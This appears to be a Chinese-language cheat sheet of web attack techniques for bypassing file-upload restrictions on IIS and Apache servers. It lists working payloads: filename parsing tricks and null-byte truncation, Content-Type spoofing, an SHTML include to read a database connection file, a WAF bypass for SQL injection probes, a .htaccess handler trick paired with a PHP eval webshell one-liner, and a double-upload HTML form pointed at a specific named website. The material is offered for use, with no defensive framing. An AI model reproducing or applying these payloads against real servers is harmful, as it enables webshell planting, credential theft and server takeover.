抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg
火狐FIREBUG修改本地JS
upfile/upfile_other.asp upfile_photo.asp upfile_flash.asp
asa cer asaspp
隐藏表单,hidden修改数据,file
00 1.asp;.jpg
十六进制00: 1.asp
双文件上传
文件名大小写突破,对于LINUX等非WINDOWS系统
asp空格
asp.
/xx.jpg%00.php
cecerr aasasa
Content-Type: image/gif (原为 Content-Type: text/plain)
上传一个shtml文件, 内容为: <!--#include file="conn.asp"--> 直接查看源文件,找数据库,然后...
apache的解析漏洞(上传1.php.hack,因为hack非法后缀,所以直接当作php执行了.
文件名为www.xxx.com/1.asp;1.jpg。这样的会被IIS安全狗果断屏蔽。改成如下名称,IIS6一样会解析:www.xxx.com/;1.asp;1.jpg
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。但如果:seo.asp?seo.com=%00.&id=69%20 and 1=1
利用.htaccess突破限制:
1.首先上传.htaccess文件到某目录下,.htacess规则:
<FilesMatch "hahahe">
SetHandler application/x-httpd-php
</FilesMatch>
2.再上传一个文件,后缀任意写,内容:
"hahahe"<?php @eval($_POST['dukong']);?>
双文件上传突破:
<form action="http://www.syxldwgy.com/upfile_Other.asp " method="post" name="form1" enctype="multipart/form-data"> <input name="FileName1" type="FILE" class="tx1" size="20"> <input name="FileName2" type="FILE" class="tx1" size="20"> <input type="submit" name="Submit" value="上传"> </form>